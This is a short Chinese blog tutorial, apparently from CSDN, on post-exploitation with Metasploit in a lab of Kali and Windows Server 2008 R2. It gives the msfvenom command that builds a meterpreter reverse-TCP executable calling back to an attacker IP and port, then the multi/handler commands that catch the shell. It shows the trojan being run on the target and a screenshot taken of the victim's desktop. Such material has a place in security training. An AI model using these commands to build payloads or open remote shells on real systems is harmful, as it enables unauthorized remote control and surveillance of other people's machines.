后渗透——MSF反弹shell

msfconsole可能是Metasploit框架(MSF)最流行的接口。它提供了一个“一体化”的集中控制台,并允许您高效地访问MSF中几乎所有可用的选项。MSFconsole一开始可能看起来有些吓人,但是一旦您了解了命令的语法,您就会了解利用这个接口的强大功能。

在这里插入图片描述

实验环境:

  • Windows Server 2008 R2 x64
  • kali

在这里插入图片描述

模拟实验:

首先输入msfconsole打开软件然后输入show payloads查看有哪些payloads可以用
在这里插入图片描述
然后找到530行的windows/x64/meterpreter_reverse_tcp前面加use使用,然后show options查看用法

在这里插入图片描述
然后再打开一个终端查看IP,把IP加入到命令msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.70.146 lport=4444 -f exe -o abc.exe中生成木马文件

在这里插入图片描述
然后将文件拖到win2008上
在这里插入图片描述
在这里插入图片描述

然后再次打开msfconsole依次输入use exploit/multi/handlerset payload windows/x64/meterpreter_reverse_tcpset lhost 192.168.70.146exploit
在这里插入图片描述
输入完后执行exe文件
在这里插入图片描述
监听到之后可以输入?查看用法
在这里插入图片描述
比如输入screenshot就截到了win2008的桌面
在这里插入图片描述
在这里插入图片描述

发布了93 篇原创文章 · 获赞 918 · 访问量 15万+

猜你喜欢

转载自blog.csdn.net/weixin_45728976/article/details/104905681